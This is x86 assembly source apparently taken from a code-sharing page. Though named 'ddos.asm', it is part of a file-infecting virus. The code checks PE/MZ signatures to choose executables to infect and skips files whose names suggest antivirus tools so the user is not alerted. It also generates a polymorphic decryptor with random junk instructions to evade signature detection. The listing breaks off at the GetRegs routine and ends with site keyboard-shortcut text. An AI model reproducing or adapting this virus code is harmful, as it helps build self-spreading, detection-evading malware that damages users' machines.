📄 ddos.asm
字号:
mov edi, esi
mov ecx, 260d
ConvertLoop: ; Convert to upper cases
lodsb
cmp al, 96d
jb Convert
cmp al, 123d
ja Convert
or al, al
jz EndConvert
sub al, 32d
Convert:
stosb
loop ConvertLoop
EndConvert:
lea edi, [ebp+WFD_szFileName]
lea esi, [ebp+FileNames]
mov ecx, 3h
FileNameCheck: ; check for av-names
push ecx ; i don't want to infect them
mov ecx, 260d
CheckON:
lodsb
repnz scasb
or ecx, ecx
jnz AVFile
pop ecx
inc esi
loop FileNameCheck
jmp EndFileNameCheck
AVFile:
mov al, byte ptr [esi] ; check if the second char also matches
cmp byte ptr [edi], al
je GotAVFile
dec esi
jmp CheckON
GotAVFile:
pop ecx ; clear stack
popad
stc ; set carriage flag
ret
EndFileNameCheck:
popad
clc
ret
FileNames db 'AV' ; we avoid these names
db 'AN' ; so we will not infect an AV and
db 'DR' ; alert the user
;****************************************************************************
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
; ***************************************************************************
; we check here for PE and MZ signs
; to identify the Executable we want to infect
; I do this a little bit different than usual *g*
CheckPESign:
cmp dword ptr [edi], 'FP' ; check if greater or equal to PF
jae NoPESign
cmp dword ptr [edi], 'DP' ; check if lower or equal to PD
jbe NoPESign
clc ; all that's left is PE
ret
NoPESign:
stc ; set carriage flag
ret
CheckMZSign:
cmp word ptr [esi], '[M'
jae NoPESign
cmp word ptr [esi], 'YM'
jbe NoPESign
clc
ret
ret
; ***************************************************************************
; ----------------[ Generate a pesudo-random Number ]------------------------
; ***************************************************************************
GetRand:
; generate a pseudo-random NR.
; based on some initial registers
push ecx ; and the Windows - Ontime
add ecx, eax
call dword ptr [ebp+XGetTickCount]
add eax, ecx
add eax, ecx
add eax, edx
add eax, edi
add eax, ebp
add eax, dword ptr [ebp+PolyLen]
add eax, dword ptr [ebp+LoopLen]
sub eax, esi
sub eax, ebx
pop ecx
add eax, ecx
add al, byte ptr [ebp+Reg1]
add ah, byte ptr [ebp+Reg2]
or eax, eax
jne GetOutRand
mov eax, 87654321h
inc eax
GetOutRand:
xor edx, edx ; clean edx ( needed to be able to divide later )
div ecx ; Random Numer is in EAX
; RND No. 'till ECX in EDX
ret
; ***************************************************************************
; ----------------------[ Generate a Poly Decryptor ]------------------------
; ***************************************************************************
genPoly:
and dword ptr [ebp+PolyLen], 0h
push 10h
pop ecx
call GetRand ; get a random number to start
; and save it as the new key used for all files
mov byte ptr [ebp+PolyKey], al
call GetRegs
lea edi, [ebp+PDecrypt] ; here starts the decryptor
call RandJunk
; we have 3 different ways to put
; the size in ecx and 3 different ways
; to get the starting offset in esi
push 2h ; divide by 2
pop ecx
call GetRand ; get a random number to decide what we do
; first
; we need these 2 values before we start the
; decryption loop !
; if edx = 1 we use the second one
dec edx ; chose the Order
jz SecondOrder
FirstOrder:
call GenerateESI ; esi comes first and ecx follows
call RandJunk
call GenerateECX ; and 4 different ways to get size in exc
jmp Polypreparefinished ; so there is nothing static here !
SecondOrder: ; ecx comes first and esi follows
call GenerateECX
call RandJunk
call GenerateESI
Polypreparefinished: ; we finished the preparing and can start the loop
; we need a
; xor byte ptr [esi], key ( or other crypto )
; inc esi / add esi, 1h
; loop Decryptor / dec ecx , jnz Above ..
; lenght of loop = 0
and dword ptr [ebp+LoopLen], 0
; now we choose the way we crypt this thing !
push 5h
pop ecx
call GetRand
mov dword ptr [ebp+CryptType], edx
XorDecrypt: ; we use a simple XOR BYTE PTR [ESI], KEY
dec edx
jnz NegDecrypt
mov ax, 3680h ; xor byte ptr [esi]
stosw
mov al, byte ptr [ebp+PolyKey]
stosb
; increase sizes ( we will add the last 2 bytes later )
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h
jmp EndPolyCrypto
NegDecrypt: ; neg byte ptr [esi]
dec edx
jnz NotDecrypt
mov ax, 1EF6h
stosw
jmp EndPolyCrypto
NotDecrypt: ; not byte ptr [esi]
dec edx
jnz IncDecrypt
mov ax, 16F6h
stosw
jmp EndPolyCrypto
IncDecrypt: ; inc byte ptr [esi]
dec edx
jnz DecDecrypt
mov ax, 06FEh
stosw
jmp EndPolyCrypto
DecDecrypt: ; dec byte ptr [esi]
mov ax, 0EFEh
stosw
EndPolyCrypto: ; add the last 2 bytes
add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h
call RandJunk ; more junk.. ;)
; now we need to increase esi
; to crypt the next byte
push 3h
pop ecx
call GetRand
IncESI1:
dec edx
jnz IncESI2
mov al, 46h ; do a simple inc esi
stosb
jmp EndIncESI
IncESI2: ; add esi, 1h
dec edx
jnz IncESI3
mov al, 83h
stosb
mov ax, 01C6h
stosw
jmp EndIncESI2
IncESI3: ; clc, adc esi, 1h
mov eax, 01d683f8h
stosd
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h
EndIncESI2:
add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h
EndIncESI:
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h
call RandJunk ; more, and more..
; now esi is incremented and we just have to do
; the loop
push 3h
pop ecx
call GetRand
LoopType1: ; we use the most common form : loop ;)
dec edx
jnz LoopType2
mov al, 0e2h
stosb
call StoreLoopLen
jmp EndLoopType
LoopType2: ; we do a dec ecx, jnz
dec edx
jnz LoopType3
mov ax, 7549h
stosw ; correct Loop Size ( dec ecx = 1 byte )
add dword ptr [ebp+LoopLen], 1h
call StoreLoopLen
add dword ptr [ebp+PolyLen], 1h
jmp EndLoopType
LoopType3:
mov eax, 0F98349h ; dec ecx cmp ecx, 0h
stosd
add dword ptr [ebp+LoopLen], 4h
mov al, 75h ; jne
stosb
add dword ptr [ebp+PolyLen], 3h
call StoreLoopLen
EndLoopType:
add dword ptr [ebp+PolyLen], 2h
mov byte ptr [edi], 0C3h ; save the ending ret
add dword ptr [ebp+PolyLen], 2h
mov eax, VirusSize ; calculate the new size for the virus
add eax, dword ptr [ebp+PolyLen]
mov dword ptr [ebp+VirLen], eax
ret
StoreLoopLen:
xor eax, eax ; calculate the size for the loop
mov ax, 100h
sub eax, dword ptr [ebp+LoopLen]
sub eax, 2h
stosb
ret
; ***************************************************************************
; --------------------------[ Insert Junk Code ]----------------------------
; ***************************************************************************
RandJunk: ; edi points to the place where they will be stored
; we will insert 1-8 junk instructions
push 7d ; each time this routine is called
pop ecx
call GetRand
xchg ecx, edx
inc ecx
push ecx
RandJunkLoop:
push ecx
push 8h
pop ecx
call GetRand ; get a random number from 0 to 7
xchg eax, edx
lea ebx, [ebp+OpcodeTable]
xlat ; get the choosen opcode
stosb ; and save it to edi
xor eax, eax ; clean eax
; get first Register
mov al, byte ptr [ebp+Reg1]
shl eax, 3h ; multiply with 8
add eax, 0c0h ; add base
; add the second register
add al, byte ptr [ebp+Reg2]
stosb ; save opcode
XchangeRegs: ; we get new ones and exchange them
Call GetRegs ; cause the rnd - generator relies on them *g*
mov al, byte ptr [ebp+Reg1]
mov ah, byte ptr [ebp+Reg2]
mov byte ptr [ebp+Reg1], ah
mov byte ptr [ebp+Reg2], al
pop ecx ; restore ecx
loop RandJunkLoop ; and loop
pop ecx ; we need the additional lenght
shl ecx, 1 ; multiply with 2
; save it
add dword ptr [ebp+LoopLen], ecx
add dword ptr [ebp+PolyLen], ecx
ret
OpcodeTable:
db 08Bh ; mov
db 033h ; xor
db 00Bh ; or
db 02Bh ; sub
db 003h ; add
db 023h ; and
db 013h ; adc
db 01Bh ; sbb
GetRegs: ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -